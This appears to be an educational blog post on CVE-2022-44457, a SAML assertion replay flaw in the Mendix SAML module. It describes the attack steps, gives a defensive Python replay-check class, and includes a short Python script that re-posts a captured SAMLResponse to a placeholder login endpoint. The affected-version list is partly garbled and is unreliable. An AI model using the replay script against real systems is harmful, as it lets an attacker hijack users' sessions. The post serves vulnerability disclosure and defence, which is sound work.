In late 2022, a serious security flaw—CVE-2022-44457—was discovered in the Mendix SAML module, affecting many organizations using Mendix for enterprise app development. The vulnerability allows threat actors to replay captured SAML authentication packets against Mendix apps when the 'Allow IdP Initiated Authentication' non-default setting is enabled. This post will break down CVE-2022-44457 in simple terms, show you how it can be exploited, and explain how to determine if you're vulnerable. This CVE is particularly important as it describes an incomplete fix for an earlier CVE (CVE-2022-37011), and leaves a security hole if you have enabled a certain option that *is not* on by default.
## What Is Affected?
A wide range of Mendix SAML module versions are affected, depending on which version of Mendix Studio Pro you use:
- V3.3. - V3.3.3
> Note: You are only vulnerable *when* the SAML module option 'Allow Idp Initiated Authentication' is turned ON. This is not the default setting, but some administrators enable it for convenience or integration requirements.
## Original References
- NVD - CVE-2022-44457
- Mendix Security Advisory
- Previous, related CVE-2022-37011
## Background: SAML & IdP-Initiated Auth
SAML (Security Assertion Markup Language) is a standard for exchanging authentication data between parties—specifically, between an identity provider (IdP) and a service provider (SP). In *IdP-initiated* flows, the user starts authentication at the identity provider, which then sends an authentication "assertion" to Mendix.
'Allow IdP Initiated Authentication' is a convenience setting for direct login, but comes with security headaches. SAML assertions can be intercepted or replayed if not properly protected.
## The Issue
The Mendix SAML module did not sufficiently protect against someone capturing a valid SAML assertion (packet) and simply replaying it later to gain access, effectively logging in as the victim. Fixes for CVE-2022-37011 existed, but only partially, and *did not* cover the special case where 'Allow IdP Initiated Authentication' was turned on. In particular, the earlier fix did not:
- Properly expire SAML assertions that arrived later via IdP-initiated logins
This means that *even after logging out*, an attacker could replay an old valid assertion and log back in as the original user.
## Attack Pre-requisites
1. The attacker is able to capture network traffic between the victim and the IdP (e.g., same network, compromised wifi, or via phishing).
## Steps to Attack
1. Capture a SAML Assertion: The attacker sniffs or logs the encrypted POST request sent from IdP to the Mendix app when a legitimate user logs in.
2. Replay the Assertion: Later, the attacker sends the same assertion POST data to the Mendix endpoint.
3. Unauthorized Access: Because the Mendix module does not check for duplicate assertions or for expired tokens (in the affected version with the setting enabled), the app processes the assertion as a valid login.
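As an added, defender-side illustration (not code from the Mendix SAML module or from this post's author), the following Python shows the two checks that step 3 says were missing: enforcing the assertion's Conditions window (NotBefore / NotOnOrAfter) and rejecting an assertion ID that has already been accepted. The Response XML, the assertion ID, the issuer URL, the subject and the timestamps are all constructed for the demo; XML signature verification is assumed to happen before the guard is consulted and is not shown.

```python
import base64
import xml.etree.ElementTree as ET
from datetime import datetime, timedelta, timezone
from typing import Dict, Optional, Tuple

# Namespaces from the SAML 2.0 core specification
SAML_NS = {
    "saml": "urn:oasis:names:tc:SAML:2.0:assertion",
    "samlp": "urn:oasis:names:tc:SAML:2.0:protocol",
}
TS_FMT = "%Y-%m-%dT%H:%M:%SZ"  # the UTC form SAML timestamps normally take


def parse_ts(s: str) -> datetime:
    return datetime.strptime(s, TS_FMT).replace(tzinfo=timezone.utc)


def format_ts(dt: datetime) -> str:
    return dt.strftime(TS_FMT)


class ReplayGuard:
    """Accepts each assertion ID once, and only inside its Conditions window.

    Assumption: the XML signature has already been verified by the caller;
    this class only adds the expiry and uniqueness checks.
    """

    def __init__(self) -> None:
        # assertion ID -> NotOnOrAfter; an ID is remembered until that moment,
        # after which the time check alone is enough to reject it
        self._seen: Dict[str, datetime] = {}

    def check(self, saml_response_b64: str,
              now: Optional[datetime] = None) -> Tuple[bool, str]:
        now = now or datetime.now(timezone.utc)
        # forget IDs whose validity window has closed (keeps the store bounded)
        self._seen = {aid: exp for aid, exp in self._seen.items() if exp > now}

        root = ET.fromstring(base64.b64decode(saml_response_b64))
        assertion = root.find("saml:Assertion", SAML_NS)
        if assertion is None:
            return False, "no assertion in response"
        aid = assertion.get("ID")
        cond = assertion.find("saml:Conditions", SAML_NS)
        if not aid or cond is None or not cond.get("NotBefore") or not cond.get("NotOnOrAfter"):
            return False, "missing ID or Conditions"
        not_before = parse_ts(cond.get("NotBefore"))
        not_on_or_after = parse_ts(cond.get("NotOnOrAfter"))

        if now < not_before:
            return False, "assertion not yet valid"
        if now >= not_on_or_after:
            return False, "assertion expired"
        if aid in self._seen:
            return False, "replayed assertion ID"
        self._seen[aid] = not_on_or_after
        return True, "accepted"


def make_response(assertion_id: str, not_before: str, not_on_or_after: str) -> str:
    """Build a constructed, unsigned SAML Response for the demo (not real IdP output)."""
    xml = f"""<samlp:Response xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol"
  xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion" ID="_demo_response" Version="2.0">
  <saml:Assertion ID="{assertion_id}" Version="2.0" IssueInstant="{not_before}">
    <saml:Issuer>https://idp.example/</saml:Issuer>
    <saml:Subject><saml:NameID>alice</saml:NameID></saml:Subject>
    <saml:Conditions NotBefore="{not_before}" NotOnOrAfter="{not_on_or_after}"/>
  </saml:Assertion>
</samlp:Response>"""
    return base64.b64encode(xml.encode()).decode()


def demo() -> Dict[str, Tuple[bool, str]]:
    """Replay the same captured assertion at several points in time."""
    guard = ReplayGuard()
    t0 = datetime(2022, 11, 8, 11, 15, 0, tzinfo=timezone.utc)  # constructed
    captured = make_response("_a1b2c3", format_ts(t0), format_ts(t0 + timedelta(minutes=5)))
    return {
        "legit_login": guard.check(captured, now=t0 + timedelta(seconds=10)),
        "replay_after_logout": guard.check(captured, now=t0 + timedelta(minutes=1)),
        "replay_after_expiry": guard.check(captured, now=t0 + timedelta(minutes=10)),
        # a fresh guard stands in for a restarted SP whose seen-ID store is empty
        "replay_after_restart": ReplayGuard().check(captured, now=t0 + timedelta(minutes=10)),
    }


if __name__ == "__main__":
    for label, result in demo().items():
        print(f"{label}: {result}")
```

Because the guard keys on the assertion ID rather than on which flow delivered it, the same check covers IdP-initiated and SP-initiated logins. Remembering an ID only until its NotOnOrAfter keeps the store bounded, and after that moment the time check alone rejects the replay, so a restart that empties the store does not reopen the hole. In a clustered deployment the seen-ID store has to be shared (a database table or cache) rather than kept per process.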
## Visualization
```text
          ┌──────┐
          │ User │
          └──────┘
              │
        [Login to IdP]
              │
              ▼
   ┌──────────────┐    SAML Auth    ┌──────────────┐
   │   Identity   │ ──────────────> │    Mendix    │
   │   Provider   │        ▲        │   App (SP)   │
   └──────────────┘        │        └──────────────┘
                    (Attacker sniffs)

   Attacker later replays the captured SAML assertion,
   bypassing user authentication.
```
## Code Snippet: Simulating a Replay Attack
Below is a simple Python script (for educational purposes only!) showing how an attacker could replay a captured SAML assertion against a Mendix service:
```python
import requests

# The URL your Mendix SAML module listens to
mendix_saml_endpoint = "https://target-mendix-app.com/sso/login"

# The POST data containing a captured SAML assertion
data = {
    'SAMLResponse': 'PASTE_CAPTURED_BASE64_SAML_ASSERTION_HERE'
}
headers = {
    'Content-Type': 'application/x-www-form-urlencoded'
}

# Re-send the captured assertion to the service provider endpoint
response = requests.post(mendix_saml_endpoint, data=data, headers=headers)

# Placeholder marker for a logged-in page; not a real Mendix response string
if "logged_in_as_user" in response.text:
    print("Exploit successful! Replayed SAML logged in the attacker.")
else:
    print("Failed to login (patched, or assertion expired).")
```
> Note: Real assertions are huge base64 strings. Sniffing them requires network access or browser dev tools.
- Silent Attack: There may be no visible sign of the exploit, especially in large enterprise apps.
- Non-default Option: Not everyone is vulnerable, but many orgs enable this feature for legacy reasons.
- Review SAML Config: Open your SAML module's configuration. If 'Allow Idp Initiated Authentication' is turned on, you are at risk.
- Are You Pre-Patched? If your module version is within the vulnerable range, update immediately. Patches fully enforcing assertion expiration and uniqueness exist in later module versions.
- Upgrade Immediately: Download the latest version of the Mendix SAML module from the Mendix Marketplace.
## Conclusion
CVE-2022-44457 demonstrates how even small configuration tweaks in security-sensitive modules can lead to major exposures—replaying authentication tokens is a classic example. While this attack only works with a non-default, *but commonly enabled*, option, you should patch immediately and review your settings if you use the Mendix SAML module.
## Further Reading
- CVE-2022-44457 Summary - NVD
- SAML Security Best Practices
- Mendix Documentation - SAML
*This post written exclusively for educational awareness. Do not attack systems without explicit permission.*
## Timeline
Published on: 11/08/2022 11:15:00 UTC
Last modified on: 12/13/2022 17:15:00 UTC